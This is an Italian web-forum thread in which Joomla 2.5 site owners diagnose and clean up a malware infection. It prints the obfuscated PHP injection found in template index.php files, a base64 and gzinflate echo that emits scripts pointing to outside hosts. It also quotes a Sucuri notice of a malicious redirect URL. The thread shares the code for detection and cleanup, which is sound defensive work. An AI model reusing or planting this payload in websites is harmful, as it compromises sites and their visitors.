[RISOLTO] malware MW:JS:ANON7 su Joomla 2.5

[apagano]

Ciao a tutti, apro questa discussione nel tentativo di rendermi utile. Stamattina ho trovato un malware su un sito joomla 2.5.6 (ultima versione rilasciata al momento in cui scrivo).
Mi sono accorto che il sito risultava lento, quindi guardando i link ho visto che nell'aprire le pagine chiamava anche url esterne.
Ho fatto una scansione del sito con Sucuri.net ed effettivamente il sito risultava infetto da MW:JS:ANON7, il quale generava script javascript che puntavano agli url esterni.
Il codice che generava gli script è il seguente

Codice: [Seleziona]

#c3284d#
echo(gzinflate(base64_decode("JYxRCoAgEAWvIvufC31G1lk2kzJKF31E3b6oz5mB6asvUWFwa3CEcIE3OeW3ZGrxjlZAO2afj0bS3GiJCfYlztPGFYJqddUxzq4lk+R4R0vOyx6+RkPP/254AA==")));
#/c3284d#e si trovava negli index.php di tutti i template installati, prima della sezione <head>.
Spero che l'esperienza risulti utile ad altri.
A presto.

[miky_2]

thanks...


quindi speriamo in un aggiornamento il prima possibile, in modo da coprire la falla 

[apagano]

thanks...

Figurati!

quindi speriamo in un aggiornamento il prima possibile, in modo da coprire la falla 

Già, speriamo sia presto.

[mau_develop]

quindi speriamo in un aggiornamento il prima possibile, in modo da coprire la falla
---------------------------------------------------
oddio ...sono rimasto indietro... che falla?

M.

[apagano]

Ciao mau_develop, non è detto che sia una falla di joomla, potrebbe trattarsi di un'estensione di terzi. Però sul sito in questione sono installati solo gantry framework e S5 Image and Content Fader v2. Sto provando a vedere se trovo chi ha generato il buco che ha portato al malware in oggetto (tra l'altro il sito è stato pubblicato solo ieri su un url di terzo livello allo scopo di farlo vedere al cliente)

[mau_develop]

non importa cosa è installato e non trovi nessuno tra i log.
Quando navigate usate noscript, è una noia sbloccare cose utili ma ti salva il sederino tante volte

PS fai una bella scansione offline del pc con un paio di AV

M.

[apagano]

non importa cosa è installato e non trovi nessuno tra i log.
Quando navigate usate noscript, è una noia sbloccare cose utili ma ti salva il sederino tante volte

PS fai una bella scansione offline del pc con un paio di AV

Uso noscript ed il problema è stato già risolto.
Stavo provando a vedere se gantry o lo slide permettono in qualche punto di scrivere sui file, per essere più preciso nella soluzione. Il sito, però, ripeto, è stato pulito e lo è tutt'ora.

[mau_develop]

hai provato a guardare come sono messi gli altri siti sul tuo server... se è un hosting condiviso.
Guarda anche se nella cartella tmp c'è qualcosa e toglila, solitamente è la shell o cmq la backdoor... se il server è tuo dai un occhiata anche nella tmp del server.

... così ... è un idea...

M.

[apagano]

hai provato a guardare come sono messi gli altri siti sul tuo server... se è un hosting condiviso.

Le cartelle tmp erano pulite, avevo già controllato, ma gli altri siti presenti su quel server, sia joomla 2.5 che joomla 1.5, erano stati bucati.

[mau_develop]

per caso salvi sessioni su file?

M.

[apagano]

Non salvo sessioni su file.

[mau_develop]

sono attacchi dove non necessariamente il sito è un cms o cmq  è vulnerabile.
cerco di raccogliere info perchè sicuramente un hosting è ben lungi dal comunicare attacchi ai server anche se a volte sono palesi... dai mi vuoi dire che c'è uno che per ogni appz sta lì a cercare l'esploit? o che tutti gli admin dei siti su quel server fanno i birichini e guardano i siti che non si deve?...
..credo che esistano una varietà di usi di questo tipo di esploit e questo fa supporre una botnet con qualche bel servizio a qualche centinaio di dollari che usa lo stesso principio ma cambia padrone e quindi scopi.

quì è spiegato + o - semplicemente https://badwarebusters.org/main/itemview/15688
... e se vedi la data ti accorgi da quanto va avanti qs gioco cambiando di forma ogni volta...
M.

[lucia86]

l'ho letto per caso questo post! è lo stesso mio virus e ho trovato il codice nel template!! per risolvere il problema basta cancellare il codice nei template sul sito e il problema si risolve?

[apagano]

Ciao Lucia86, cancellando il codice il problema si risolve, almeno momentaneamente, nel senso che devi individuare, magari insieme a chi ti fa hosting, qual'è stato l'attacco che infettato il sito, altrimenti rischi che si ripeta. Io, comunque, ho cancellato il codice all'apertura del post e ad oggi i siti risultano puliti.

[apagano]

Ciao Mau_develop, hai ragione sulla resistenza di chi fa hosting. Purtroppo sono coscente del fatto che il server su cui si trova qualcuno dei miei siti (tra cui il mio) è stato messo sotto attacco. L'impressione che ho avuto, dalle notizie che mi sono state date, è che sia stato bucato l'ftp server, con lo scopo di fare spam.

[lucia86]

Ciao io ho tolto il codice dal template ma continua a dirmi che c'è un problema quando faccio l'analisi del sito su http://sitecheck.sucuri.net

Suspicious conditional redirect.
Details: http://sucuri.net/malware/entry/MW:HTA:7
 Redirects users to:http://methuenedge.com/stats.php

[apagano]

Sei sicura di aver tolto il codice da tutti i file in cui si trovava?

[lucia86]

sono solo i file index.php del template?

[apagano]

Nel mio caso era così, ma i file erano relativi a tutti i template

[lucia86]

c'è qualche metodo per fare una ricerca automatica di quel codice in tutte le pagine del sito?